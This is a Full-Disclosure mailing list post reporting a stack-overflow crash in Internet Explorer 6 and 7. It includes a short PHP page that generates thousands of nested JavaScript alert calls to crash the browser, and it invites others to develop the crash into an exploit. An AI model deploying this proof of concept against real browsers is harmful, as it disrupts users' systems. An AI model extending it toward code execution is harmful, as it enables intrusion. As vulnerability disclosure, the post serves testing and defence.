Full Disclosure: Internet Explorer 6.x Stack Overflow

[Adriaan <adriaangraas () gmail com>]

IE 6.x Stack Overflow

It is tested on IE7 and serveral versions of IE6, though not below 6.
In some cases the browser does not crash but displays a Run-time
memory full error.
This happens when Windows does not have SP2 - but I didn't test it thoroughly.

/* ie_stack.php */
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd ">
<html>
<head>
  <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
  <title>Internet Explorer 6.x Stack Overflow</title>
</head>
<body>
<div style="width:400px;padding:10px;margin:10px;border:1px dashed silver;">
<p>
Copyright &copy; Adriaan Graas<br />
Internet Explorer 6.x Stack Overflow
</p>
<p>
Change the amount of code by changing the <tt>GET j</tt> variable in
the url, f.e. <tt>index.php?j=10000</tt>.
</p>
<script language="JavaScript">
<!--
<?php
if(!isset($_GET['j'])) $_GET['j']=10000;
if($_GET['j'] < 1000000){
for($i=0;$i<$_GET['j'];$i++){ echo"alert(alert("; }
for($i=0;$i<$_GET['j'];$i++){ echo"))"; }
}else{
 echo"document.write(\"Sorry, <tt>j >= 1000000</tt> is not allowed.\");";
}
?>
// -->
</script>
</div>
</body>
</html>
/* End of file */

This script is also hosted here:
http://www.pc1337.nl/iestack/iestack.php?j=10000.

The php can easily be rewritten to javascript or vbscript.
In fact, you can use functions different than alert() to overflow the stack.
I am not experienced enough to exploit this. It would be nice if
someone works this out. More tests are also welcome.

Adriaan Graas

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/